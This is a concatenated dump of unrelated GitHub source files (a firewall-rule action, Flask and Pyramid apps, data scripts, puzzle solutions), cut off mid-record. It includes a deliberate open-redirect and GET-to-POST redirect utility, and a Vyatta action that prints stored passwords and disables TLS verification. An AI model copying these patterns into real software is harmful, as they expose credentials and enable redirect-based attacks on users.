-1\n for i in range(0, max_i + 1):\n # print('i={0}'.format(i))\n if tasks[i]['active']:\n active_i = i\n break\n # print('active_i={0}, offset={1}'.format(active_i, offset))\n\n i_active = active_i + offset\n i1 = i_active - 1\n i2 = i_active + 1\n # if(backwards):\n # i_active = active_i - 1\n # i1 = active_i - 2\n # i2 = active_i\n # else:\n # i_active = active_i + 1\n # i1 = active_i\n # i2 = active_i + 2\n # print('get_next_task() p={0} a={1} n={2}'.format(i1, i_active, i2))\n\n # Handle out of ranges\n if i_active < 0:\n i_active = max_i + i_active + 1\n elif i_active >= max_i:\n i_active = i_active - max_i - 1\n if i1 < 0:\n i1 = max_i + i1 + 1\n elif i1 >= max_i:\n i1 = i1 - max_i - 1\n if i2 < 0:\n i2 = max_i - i2 + 1\n elif i2 >= max_i:\n i2 = i2 - max_i - 1\n\n # print('get_next_task() p={0} a={1} n={2}'.format(i1, i_active, i2))\n return dict(a_task=tasks[i_active], p_task=tasks[i1],\n n_task=tasks[i2])","repo_name":"chs8691/fow","sub_path":"dist/debian/usr/lib/fow/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":5789,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2870940641","text":"import os\r\nimport re\r\nimport tkinter as tk\r\nimport tkinter.messagebox\r\nimport sys\r\n\r\nroot = tk.Tk()\r\nroot.withdraw()\r\nregexx = r\"SpawnDino (\\\".*\\\")\"\r\nResult = {}\r\nres = \"\"\r\ntick = 0\r\n\r\n\r\nif os.path.isfile('./Output.txt'):\r\n with open('./Output.txt', 'r', encoding='utf-8') as f:\r\n readfiles = f.read()\r\nelse:\r\n tkinter.messagebox.showerror(\"Error!\",\"Output.txt does not exist in this folder, make sure you run the ARK Code Generator first!\")\r\n sys.exit(0)\r\n \r\n\r\nResult[0] = re.findall(regexx, readfiles)\r\n\r\nfor stuff in Result[0]:\r\n if tick == 1000:\r\n with open('./NewOutput.txt', 'w', encoding='utf-8') as ff:\r\n ff.write(res)\r\n tkinter.messagebox.showinfo(\"Limit of 1000 Reached!\",\"Your Blueprint paths is in the \\\"NewOutput.txt\\\" file.\")\r\n sys.exit()\r\n res += ('{}'.format(stuff+\";\"))\r\n tick += 1\r\n\r\nif res == \"\":\r\n tkinter.messagebox.showerror(\"Error!\",\"Output.txt does not contain any dinosaurs!\")\r\n sys.exit()\r\n\r\nwith open('./NewOutput.txt', 'w', encoding='utf-8') as ff:\r\n ff.write(res)\r\n\r\ntkinter.messagebox.showinfo(\"Success!\",\"Your Blueprint paths is in the \\\"NewOutput.txt\\\" file.\\nTotal Dinos: {}\".format(tick))\r\n","repo_name":"Lust-Ware/SimpleSpawnersBlueprintMaker","sub_path":"SimpleSpawners BluePrint Maker.py","file_name":"SimpleSpawners BluePrint Maker.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"30587718619","text":"import requests\nimport warnings\nimport json\nfrom st2client.client import Client\nfrom st2common.runners.base_action import Action\n\n\nclass InternalCfgFwRule(Action):\n def run(self, deviceIP, cmd_path, fw_instance_name,\n rule_number, rule_content):\n\n cmd_path = cmd_path[:26]\n rule_number = str(rule_number)\n\n # Fetching device credentials based on keys derived from deviceIP\n #################################################################\n user_key_name = deviceIP + \"_user\"\n pswd_key_name = deviceIP + \"_pswd\"\n print(\"\\n\")\n print(\">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\")\n print(\"Looking for credentials in KV store\")\n client = Client()\n try:\n user = (client.keys.get_by_name(user_key_name)).value\n pswd = (client.keys.get_by_name(pswd_key_name)).value\n print(\" Obtained from KV store: user = \" + user)\n print(\" Obtained from KV store: pswd = \" + pswd)\n except Exception:\n return (False, \"No credentials for : \" + deviceIP)\n\n # Preapring the URL request(s)\n #################################################################\n h = {\n \"accept\": \"application/json\",\n \"content-length\": \"0\"\n }\n\n url_0 = \"https://\" + deviceIP + \"/\" + cmd_path\n url_1 = \"/set/security/firewall/name/\" + fw_instance_name\n url_2 = \"/rule/\" + rule_number\n url_base = url_0 + url_1 + url_2\n\n url_list = list()\n\n # Fetching content of 'rule_filter' object and build URL calls list\n #################################################################\n if 'action' in rule_content:\n action = rule_content['action']\n url = url_base + \"/action/\" + action\n url_list.append(url)\n\n if 'state' in rule_content:\n state = rule_content['state']\n url = url_base + \"/state/\" + state\n url_list.append(url)\n\n if 'src_addr' in rule_content:\n src_addr = rule_content['src_addr'].replace(\"/\", \"%2F\")\n url = url_base + \"/source/address/\" + src_addr\n url_list.append(url)\n\n if 'src_port' in rule_content:\n try:\n protocol = rule_content['protocol']\n except Exception:\n print(\"protocol required in filter_list parameter\")\n\n url = url_base + \"/protocol/\" + protocol\n url_list.append(url)\n src_port = rule_content['src_port']\n url = url_base + \"/source/port/\" + src_port\n url_list.append(url)\n\n if 'dst_addr' in rule_content:\n dst_addr = rule_content['dst_addr'].replace(\"/\", \"%2F\")\n url = url_base + \"/destination/address/\" + dst_addr\n url_list.append(url)\n\n if 'dst_port' in rule_content:\n try:\n protocol = rule_content['protocol']\n except Exception:\n print(\"protocol required in filter_list parameter\")\n\n url = url_base + \"/protocol/\" + protocol\n url_list.append(url)\n dst_port = rule_content['dst_port']\n url = url_base + \"/destination/port/\" + dst_port\n url_list.append(url)\n\n # Sending the URL call(s)\n #################################################################\n print(\"Sending REST call(s):\")\n for u in url_list:\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n print(\" PUT \" + u)\n r = requests.put(u, auth=(user, pswd), headers=h, verify=False)\n r_code = str(r.status_code)\n print(\" Response code: \" + r_code)\n cmd_response_code = int(r.status_code)\n if cmd_response_code != 200:\n return (False, cmd_response_code)\n else:\n try:\n data = json.loads(r.text)\n print(\" Response body: \")\n print(json.dumps(data, sort_keys=True, indent=4))\n except Exception:\n print(\" Response body: empty\")\n print(\">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\")\n","repo_name":"StackStorm-Exchange/stackstorm-vyatta","sub_path":"actions/0_cfg_fw_rule.py","file_name":"0_cfg_fw_rule.py","file_ext":"py","file_size_in_byte":4331,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"70570062132","text":"from flask import Flask\n\nfrom app.configs import env_configs, database, migration\nfrom app.routes import category_blueprint, task_blueprint, get_blueprint\n\n\ndef create_app():\n\n app = Flask(__name__)\n env_configs.init_app(app)\n database.init_app(app)\n migration.init_app(app)\n\n app.register_blueprint(category_blueprint.bp)\n app.register_blueprint(task_blueprint.bp)\n app.register_blueprint(get_blueprint.bp)\n\n return app\n","repo_name":"Charles-Pinheiro/matriz-eisenhower","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23377633781","text":"from pyramid.response import Response\nfrom pyramid.view import view_config\n\n\ndef _check_missing_params(request, required_params):\n missing_params = [param for param in required_params if param not in request.params]\n\n if missing_params:\n message = \"\"\n\n for param in missing_params:\n message += \"Missing param: {}\\n\".format(param)\n\n resp = Response(message)\n resp.headers['Content-Type'] = 'text/plain'\n return resp\n return None\n\n\n@view_config(route_name='utils_redirect_home', renderer='prettyjson')\ndef redirect_home(request):\n return {'routes': ['302', '307', 'get_to_post']}\n\n\n@ view_config(route_name='redirect_302')\ndef redirect_302(request):\n missing_params = _check_missing_params(request, ['url'])\n\n if missing_params:\n return missing_params\n\n url = request.params['url']\n resp = Response(status=302)\n resp.headers['Location'] = url\n return resp\n\n\n@view_config(route_name='redirect_307')\ndef redirect_307(request):\n missing_params = _check_missing_params(request, ['url'])\n\n if missing_params:\n return missing_params\n\n url = request.params['url']\n resp = Response(status=307)\n resp.headers['Location'] = url\n return resp\n\n\n@view_config(route_name='redirect_get_to_post', request_method='GET')\ndef redirect_get_to_post(request):\n missing_params = _check_missing_params(request, ['url'])\n\n if missing_params:\n return missing_params\n\n action = request.current_route_url()\n resp = Response(r'''\n \n
\n \n '''.format(action), status=200)\n resp.headers['Content-Type'] = 'text/html'\n return resp\n\n\n@view_config(route_name='redirect_get_to_post', request_method='POST')\ndef redirect_get_to_post_via_post(request):\n missing_params = _check_missing_params(request, ['url'])\n\n if missing_params:\n return missing_params\n\n url = request.params['url']\n\n resp = Response(status=307)\n resp.headers['Location'] = url\n return resp","repo_name":"d0nutptr/d0nut.sh","sub_path":"d0nut_sh/utils_redirect.py","file_name":"utils_redirect.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17651559811","text":"import os\nimport pandas as pd\nimport re\n\ndef mergeDust(filePath):\n print(filePath)\n extension = os.path.splitext(filePath)[1]\n if extension == '.csv':\n data = pd.read_csv(filePath)\n else :\n data = pd.read_excel(filePath)\n\n data.fillna(0, inplace=True)\n out = {}\n for idx in range(len(data)):\n day = data.iloc[idx][0]\n dust = data.iloc[idx][6]\n if day in out:\n out[day][0] += dust\n out[day][1] += 1\n else:\n out[day] = [dust,1]\n\n for key, value in out.items():\n out[key] = round(value[0]/value[1], 2)\n \n return out\ndef init():\n Dir = './대기오염도'\n fileList = os.listdir(Dir)\n for File in sorted(fileList):\n out = {}\n filePath = '/'.join([Dir, File])\n out.update(mergeDust(filePath))\n year = re.sub('[^0-9]', '',File).strip()\n out_file = pd.DataFrame(list(out.items()), columns=['day', 'dust'])\n out_file.to_csv('./전처리/일별/대기오염도/%s.csv' %year, index=False)\n\nif __name__ == '__main__':\n print('main')\n init()","repo_name":"Hyun-mo/2021-Data-Analysis","sub_path":"merge_dust.py","file_name":"merge_dust.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13649364369","text":"\"\"\"Work with ImageMagick.\"\"\"\nimport os\nimport subprocess\n\n\ndef convert_pdf_to_images(pdf_file_path: str, images_folder_path: str, temp_folder_path: str):\n \"\"\"Convert a PDF file to high-resolution images using ImageMagick.\"\"\"\n env = os.environ.copy()\n env['MAGICK_TEMPORARY_PATH'] = temp_folder_path\n try:\n subprocess.run(\n [\n \"convert\", \"-density\", \"300\", pdf_file_path,\n \"-quality\", \"100\",\n os.path.join(images_folder_path, \"output-%03d.tif\")\n ],\n check=True,\n env=env\n )\n except subprocess.CalledProcessError as err_msg:\n print('Error:', err_msg.stderr)\n\n\ndef create_pdf_from_images(images_folder_path: str, output_pdf_path: str):\n \"\"\"Create a PDF file from high-resolution images using ImageMagick's convert command.\"\"\"\n try:\n subprocess.run(\n [\n \"convert\", os.path.join(images_folder_path, \"*.tif\"),\n output_pdf_path\n ],\n check=True\n )\n print(\"PDF file created successfully.\")\n except subprocess.CalledProcessError as err:\n print('Error:', err.stderr)\n","repo_name":"dph0899/my-utils","sub_path":"pdf/image_magick.py","file_name":"image_magick.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5428444607","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/4/3 下午3:20\n# @Author : ZS\n# @Email : @163.com\n# @File : 异常处理.py\n# @Software: PyCharm\n\n'''\nwhile True:\n\n try:\n\n number = input(\"输入序列号\")\n i = int(number)\n pass\n\n except IndexError as e:\n\n pass\n\n except ValueError as e:\n\n pass\n\n except Exception as e:\n\n print(e)\n i = 1\n pass\n\n else:\n #没有出错时执行\n print('没有出错时执行')\n pass\n\n finally:\n\n #最终都会执行\n print('最终都会执行')\n pass\n\n # raise Exception(\"主动触发异常\")\n\n\nprint(i)\n\n'''\n\n\n#自定义异常\n\nclass MyException(Exception):\n\n def __init__(self,message):\n self.message = message\n\n\n\n def __str__(self):\n return self.message\n\n\n\n\nobj = MyException(\"my exception\")\n\nprint(obj)\n\n\ntry:\n\n raise MyException(\"主动触发的异常错误\")\n\nexcept MyException as e:\n\n print(e) #调用 __str__方法并打印出返回值\n\n\n\n#assert 条件断言 用于用户强制服从,不服从报错 可以捕获但一般不捕获\n\n# assert 1==3\n","repo_name":"flyalt/Exywt","sub_path":"Exywt/异常处理/异常处理.py","file_name":"异常处理.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5717388353","text":"from collections import deque\nfrom dataclasses import dataclass\nfrom inspect import stack\nfrom advent.util.points import Point3D, Vector3D, surrounding_3d_points\nfrom ..utils import iterlines, Range, Window\n\n@dataclass\nclass Zone(Window):\n def __init__(self):\n self.z_range = Range()\n \n def push(self, v):\n super().push(v)\n self.z_range.push(v)\n\n def extend(self, p3):\n super().extend(p3)\n self.z_range.extend(p3.z)\n \n def __contains__(self, p3):\n if not super().__contains__(p3):\n return False\n return p3.z in self.z_range\n\ndef parse_input(is_test):\n points = set()\n zone = Zone()\n for line in iterlines(18, is_test):\n coords = tuple(map(int, line.split(\",\")))\n p = Point3D(*coords)\n points.add(p)\n zone.extend(p)\n return points, zone\n\ndef surface_area(points, outside=None):\n sa = 0\n for point in points:\n for next_point in surrounding_3d_points(point):\n if not next_point in points:\n if outside is None or next_point in outside:\n sa += 1\n return sa\n \ndef make_steam(zone, points):\n seen = set()\n touching = set()\n zone.push(1)\n q = deque([\n Point3D(\n zone.x_range.rmin,\n zone.y_range.rmin,\n zone.z_range.rmin,\n )\n ])\n while q:\n current_point = q.pop()\n for next_point in surrounding_3d_points(current_point):\n if next_point not in zone:\n continue\n if next_point in seen:\n continue\n if next_point in points:\n touching.add(current_point)\n continue\n q.append(next_point)\n seen.add(current_point)\n return touching\n\n \n \n \n\ndef part1(is_test):\n points, _ = parse_input(is_test)\n sa = surface_area(points)\n print(sa)\n\n\ndef part2(is_test):\n points, zone = parse_input(is_test)\n steam = make_steam(zone, points)\n sa = surface_area(points, steam)\n print(sa)\n \n\npart1(True)\npart1(False)\npart2(True)\npart2(False)","repo_name":"jansenk/advent-of-code","sub_path":"advent/2022/solutions/18.py","file_name":"18.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35708211710","text":"from common.base_modules.candidate_movement import CandidateMovement\nfrom common.base_modules.politics_vector import PoliticsVector\n\nclass BasicCandidateMovement(CandidateMovement):\n\n #Move the candidate to the closest point in the tolerable radius to the centroid of the voters.\n def move(self, candidate, district):\n tolerable_radius = 0.1\n centroid_x = 0\n centroid_y = 0\n for voter in district.voters:\n centroid_x += voter.views.get(0) / len(district.voters)\n centroid_y += voter.views.get(1) / len(district.voters)\n distance = candidate.views_base.distance(PoliticsVector(2, [centroid_x, centroid_y]))\n if distance <= tolerable_radius:\n candidate.views_current = PoliticsVector(2, [centroid_x, centroid_y])\n else:\n ratio = tolerable_radius / distance\n new_x = candidate.views_base.get(0) + (centroid_x - candidate.views_base.get(0)) * ratio\n new_y = candidate.views_base.get(1) + (centroid_y - candidate.views_base.get(1)) * ratio\n candidate.views_current = PoliticsVector(2, [new_x, new_y])","repo_name":"steventhynes/voting-system-simulator","sub_path":"common/candidate_movements.py","file_name":"candidate_movements.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27440924510","text":"import unittest\n\nfrom specex.sources import detect_from_cube\n\nfrom test import make_synt_cube\n\n\nclass TestSourceDetection(unittest.TestCase):\n\n reg_file, cat_file, cube_file = make_synt_cube.main(overwrite=False)\n\n def test_extract_sources(self):\n detect_from_cube([self.cube_file])\n\n\nif __name__ == '__main__':\n mytest = TestSourceDetection()\n mytest.test_extract_sources()\n","repo_name":"mauritiusdadd/python-specex","sub_path":"test/test_sources.py","file_name":"test_sources.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2978529709","text":"class Node:\n def __init__(self, elem):\n self.elem = elem\n self.next = None\n\n def __repr__(self):\n return str(self.elem)\n\nclass CircularList:\n def __init__(self, node = None):\n self.rear = node\n self.head = node\n if node:\n node.next = node\n \n def is_empty(self):\n return self.rear == None\n\n def length(self):\n if self.is_empty():\n return 0\n else:\n cur = self.rear\n count = 1\n while cur.next != self.rear:\n count += 1\n cur = cur.next\n return count\n\n def append(self, item):\n node = Node(item)\n if self.is_empty():\n self.head = node\n self.rear = node\n node.next = node\n else:\n node.next = self.rear.next \n self.rear.next = node\n self.rear = node\n \n\n def prepend(self, item):\n node = Node(item)\n if self.is_empty():\n self.head = node\n self.rear = node\n node.next = node\n else:\n node.next = self.head\n self.head = node\n self.rear.next = node\n \n \n\n def delete(self, pos):\n if self.is_empty():\n return\n cur = self.head \n pre = None\n cnt = 1\n while cur.next != self.head:\n if pos == cnt:\n if cur == self.head: \n self.head = cur.next\n self.rear.next = self.head\n else:\n pre.next = cur.next \n return\n else:\n pre = cur\n cur = cur.next\n cnt += 1\n \n def printList(self):\n if self.is_empty():\n return\n p = self.rear.next\n print(\"Head\", end=' ')\n while True:\n print(\"-->\", p.elem, end=' ')\n if p is self.rear:\n break\n p = p.next\n print(\"--> Rear\")\n\n","repo_name":"cyndereN/Python-Learning","sub_path":"UCL/Algorithms/Exercises/circular_lists.py","file_name":"circular_lists.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4603362424","text":"import http.client\nimport json\n\nconn = http.client.HTTPSConnection(\"127.0.0.1\", 8088)\npayload = json.dumps({\n \"ime\": \"Luka\",\n \"prezime\": \"Stankovic\",\n \"username\": \"lstankovic16\",\n \"smer\": \"RM\",\n \"predmeti\": [\n {\n \"ime\": \"OperativniSistemi\",\n \"espb\": \"8\"\n },\n {\n \"ime\": \"DigitalneKomunikacije\",\n \"espb\": \"8\"\n },\n {\n \"ime\": \"PrimenjeniDistribuiraniSistemi\",\n \"espb\": \"6\"\n },\n {\n \"ime\": \"DigitalnaObradaSignala\",\n \"espb\": \"6\"\n }\n ]\n})\nheaders = {\n 'Content-Type': 'application/json'\n}\nconn.request(\"POST\", \"/users\", payload, headers)\nres = conn.getresponse()\ndata = res.read()\nprint(data.decode(\"utf-8\"))","repo_name":"GentleWalker/DockerFax","sub_path":"client/postRequest.py","file_name":"postRequest.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26679713519","text":"from util import *\nimport numpy as np\nfrom numpy import dot\nfrom numpy.linalg import norm\n# Add your import statements here\nimport operator\nimport datetime as dt\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nclass InformationRetrieval():\n\n def __init__(self):\n self.index = None\n\n def buildIndex(self, docs, docIDs):\n \"\"\"\n Builds the document index in terms of the document\n IDs and stores it in the 'index' class variable\n\n Parameters\n ----------\n arg1 : list\n A list of lists of lists where each sub-list is\n a document and each sub-sub-list is a sentence of the document\n arg2 : list\n A list of integers denoting IDs of the documents\n Returns\n -------\n None\n \"\"\"\n # print('-'*30,'\\n', docIDs,'\\n', '-'*30)\n start = dt.datetime.now()\n index = None\n D = len(docs)\n # print(\"len(docs)\",len(docs))\n \n list_of_words = []\n \n for document in docs:\n for sentence in document:\n for word in sentence:\n list_of_words.append(word) #this can have repetition of words \n\n self.list_unique = list(set(list_of_words))\n\n # print('unique_list operation took:', dt.datetime.now()-start)\n\n start = dt.datetime.now()\n df = np.zeros(len(self.list_unique)) # df(i) is number of docs containing term i, used for calculating IDF \n \n TD_matrix = np.zeros([len(self.list_unique),len(docs)]) #term-document matrix\n \n \n for j, doc in enumerate(docs): # iterate over documents\n for k, sentence in enumerate(doc): # iterate over sentences for a document\n for word in sentence:\n # for i, unique_word in enumerate(self.list_unique): # iterate over terms\n # if unique_word == word:\n # TD_matrix[i,j] += 1 # update term frequency\n # break\n try:\n TD_matrix[self.list_unique.index(word),j] += 1\n except:\n temp_skip = 0\n \n df = np.sum(TD_matrix > 0, axis=1)\n\n self.IDF = np.log(D/df) \n # print('IDF operation took:', dt.datetime.now()-start)\n\n start = dt.datetime.now()\n\n self.doc_weights = np.zeros([len(self.list_unique),len(docs)])\n # print(\"check if 8835: \", len(self.doc_weights[:,0]))\n \n for i in range(len(self.list_unique)):\n self.doc_weights[i,:] = self.IDF[i]*TD_matrix[i,:] # vector weights for each document \n \n\n index = {key: None for key in docIDs} # initialize dictionary with keys as doc_IDs\n \n for j in range(len(docs)): \n index[docIDs[j]] = self.doc_weights[:,j] # update dict-values with weight vector for corresponding docIDs \n \n # print(\"len(self.doc_weights[:][0]\", len(self.doc_weights[:,0])) \n # print('doc_weights operation took:', dt.datetime.now()-start)\n self.index = index\n \n\n def rank(self, queries):\n \"\"\"\n Rank the documents according to relevance for each query\n\n Parameters\n ----------\n arg1 : list\n A list of lists of lists where each sub-list is a query and\n each sub-sub-list is a sentence of the query\n \n\n Returns\n -------\n list\n A list of lists of integers where the ith sub-list is a list of IDs\n of documents in their predicted order of relevance to the ith query\n \"\"\"\n\n # we have already calculated the document vectors in previous function\n start = dt.datetime.now()\n TQ_matrix = np.zeros([len(self.list_unique),len(queries)]) # term frequency matrix (for each query in list queries)\n \n for i, unique_word in enumerate(self.list_unique):\n for j, query in enumerate(queries): # iterate over all queries\n for k, sentence in enumerate(query): # iterate over sentences for a query\n for word in sentence:\n if unique_word == word:\n TQ_matrix[i,j] += 1 \n\n # print('TQ operation took:', dt.datetime.now()-start)\n start = dt.datetime.now()\n self.query_weights = np.zeros([len(self.list_unique),len(queries)])\n \n for i, unique_word in enumerate(self.list_unique):\n self.query_weights[i,:] = self.IDF[i]*TQ_matrix[i,:] # vector weights for each query \n \n id_docs = list(self.index.keys())\n \n \n doc_IDs_ordered = list(range(len(queries)))\n # print('Pre-Ranking operation took:', dt.datetime.now()-start)\n start = dt.datetime.now()\n # print('length of queries:', len(queries))\n for j in range(len(queries)):\n dict_cosine = {key: None for key in id_docs} # given ONE query, stores cosine measures for between query and all docs\n # for i in range(len(self.index)):\n # a = self.index[id_docs[i]]\n # b = self.query_weights[:,j]\n # dict_cosine[id_docs[i]] = dot(a,b)/(norm(a)*norm(b))\n for doc_id, doc_vector in self.index.items():\n a = doc_vector\n b = self.query_weights[:,j]\n dict_cosine[doc_id] = dot(a,b)/(norm(a)*norm(b))\n \n dc_sort = sorted(dict_cosine.items(),key = operator.itemgetter(1),reverse = True)\n # temp = [x for x, _ in dc_sort]\n # for k in range(len(dc_sort)):\n # temp.append(dc_sort[k][0]) # take only the keys (doc IDs) and store in temp\n \n \n doc_IDs_ordered[j] = [x for x, _ in dc_sort] #sorted docIDs stored corresponding to that query \n # print('Ranking operation took:', dt.datetime.now()-start)\n\n # doc_IDs_ordered = []\n\n #Fill in code here\n\n return doc_IDs_ordered\n\n\n\n\n","repo_name":"Shania99/CS6730-Natural-Language-Processing","sub_path":"Assignment-1/informationRetrieval.py","file_name":"informationRetrieval.py","file_ext":"py","file_size_in_byte":6127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3866716684","text":"import os\nimport discord.abc\nfrom discord.ext import commands\nfrom dotenv import load_dotenv\n\nload_dotenv()\nTOKEN = os.getenv(\"DISCORD_TOKEN\")\nGUILD = os.getenv(\"DISCORD_GUILD\")\nintents = discord.Intents.default()\nintents.members = True\nintents.message_content = True\nbot = commands.Bot(command_prefix=\"$\", intents=intents)\n# bot event (when its ready)\n\n\n@bot.event\nasync def on_ready():\n for guild in bot.guilds:\n if guild.name == GUILD:\n break\n\n print(\n f\"{bot.user} is connected to the following guild:\\n\"\n f\"{guild.name}(id: {guild.id})\"\n )\n\n members = \"\\n - \".join([member.name for member in guild.members])\n print(f\"Guild Members:\\n - {members}\")\n\n\n@bot.event\nasync def on_message(message):\n await bot.process_commands(message)\n if message.author == bot.user:\n return\n\n steve_jobs_quote = \"Innovation distinguishes between a leader and a follower.\"\n\n if message.content == \"steve\":\n await message.channel.send(steve_jobs_quote)\n\n\n@bot.command()\nasync def test(ctx, *args):\n \"\"\"Tells you a member's roles.\"\"\"\n arguments = \" \".join(args)\n await ctx.send(arguments)\n\n\n@bot.command()\nasync def add(ctx, a: int, b: int):\n await ctx.send(a + b)\n\n\nbot.run(TOKEN)\n","repo_name":"vazqueztomas/discord_bot","sub_path":"bot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30883586510","text":"from manimlib.imports import *\nimport math\nimport numpy as np\n\nclass integral(GraphScene):\n CONFIG = {\n \"x_max\" : 20,\n \"y_max\" : 10,\n \"y_axis_height\" : 5,\n \"init_dx\" : 0.5,\n }\n\n\n def construct(self):\n self.show_function_graph()\n\n\n \n def show_function_graph(self):\n self.setup_axes(animate = True)\n\n #math functions\n\n\n def func(x):\n \n return (2.71**(0.1*x))*np.sin(x)\n\n \n #graph \n graph = self.get_graph(func , x_min = -1 , x_max = 20 )\n\n graph.set_color(YELLOW)\n kwargs = {\n \"x_min\" : 5, \n \"x_max\" : 15,\n \"fill_opacity\" : 0.75,\n \"stroke_width\" : 0.25,\n }\n \n self.play(ShowCreation(graph), runtime = 5)\n self.wait(1)\n\n \n \n riemann_rectangles_list = self.get_riemann_rectangles_list(\n graph,\n 6,\n max_dx=self.init_dx,\n power_base=2,\n start_color=PURPLE,\n end_color=ORANGE,\n **kwargs\n )\n \n self.play(ShowCreation(riemann_rectangles_list[0]))\n self.wait()\n\n for r in range(1, len(riemann_rectangles_list)):\n self.play(ReplacementTransform(riemann_rectangles_list[r-1], riemann_rectangles_list[r]))\n\n\n \n self.wait(2)\n \n self.play(*[Uncreate(item) for item in riemann_rectangles_list])\n self.play(Uncreate(graph))\n self.play(*[FadeOut(i) for i in self.axes])\n self.wait(4)\n \n\n group_dots = VGroup(*[Dot() for _ in range(3)])\n group_dots.arrange_submobjects(RIGHT)\n\n for dot in group_dots: \n self.play(FadeIn(dot))\n \n self.wait()\n \n","repo_name":"arhantbararia/Math-Animation-Repo","sub_path":"integration.py","file_name":"integration.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22435722035","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution(object):\n def deleteDuplicates(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n l = ListNode()\n curr = l\n l.next = head\n val = 0\n while head:\n val = head.val\n while head is not None and val == head.val:\n head = head.next\n if l.next.next == head:\n l = l.next\n else:\n l.next = head\n return curr.next\n","repo_name":"muskaan-codes/leetcoding-challenges","sub_path":"JanuaryCodingChallenge/Day-5-Remove-Duplicates-from-Sorted-List-II.py","file_name":"Day-5-Remove-Duplicates-from-Sorted-List-II.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38933941355","text":"from run_single_attack import *\r\nimport pickle\r\nimport os\r\nfrom tqdm import tqdm\r\nfrom cal_acc import calculate_acc_weighted\r\n\r\n\r\n\r\ndef test_durability(test_times,kws_uni_size,datasets = [\"enron\",\"lucene\"]):\r\n if not os.path.exists(\"./results\"):\r\n os.makedirs(\"./results\")\r\n if not os.path.exists(\"./results/test_durability\"):\r\n os.makedirs(\"./results/test_durability\")\r\n\r\n for dataset in datasets:\r\n if dataset == \"wiki\":\r\n Eta = [2,10,20,30]\r\n observed_time = 30\r\n query_number_per_week = 5000\r\n else:\r\n Eta = [10,50,100,150]\r\n observed_time = 50\r\n query_number_per_week = 2000\r\n Acc_Eta = []\r\n for _ in tqdm(range(test_times)):\r\n acc_Eta = []\r\n for eta in Eta:\r\n attack_params = {\"alg\":\"Ours\",\"alpha\":0.3,\"step\":3,\\\r\n \"baseRec\":100,\"confRec\":50,\\\r\n \"beta\":0.8,\"no_F\":None,\"refinespeed\":15}\r\n result = run_single_attack(kws_uni_size,kws_uni_size,\"sorted\",query_number_per_week,observed_time,eta,dataset,\\\r\n {\"alg\":None},attack_params)\r\n data_for_acc_cal = result[\"data_for_acc_cal\"]\r\n tdid_2_kwid = result[\"results\"][1]\r\n correct_count,acc,correct_id,wrong_id=calculate_acc_weighted(data_for_acc_cal,tdid_2_kwid)\r\n print(\"time offset(weeks):\",eta,\"| Acc: \",acc)\r\n acc_Eta.append(acc)\r\n Acc_Eta.append(acc_Eta)\r\n with open(\"results/test_durability/\"+dataset+\".pkl\", \"wb\") as tf:\r\n pickle.dump([Eta,Acc_Eta],tf)\r\n print(np.average(np.array(Acc_Eta),axis=0))\r\n\r\ntest_durability(30,1000,[\"enron\",\"lucene\"])\r\ntest_durability(30,3000,[\"wiki\"])\r\n \r\n","repo_name":"JigsawAttack/JigsawAttack","sub_path":"test_durability.py","file_name":"test_durability.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14932513195","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom datetime import date, datetime # noqa: F401\n\nfrom typing import List, Dict # noqa: F401\n\nfrom swagger_server.models.base_model_ import Model\nfrom swagger_server.models.action import Action # noqa: F401,E501\nfrom swagger_server.models.meta_data import 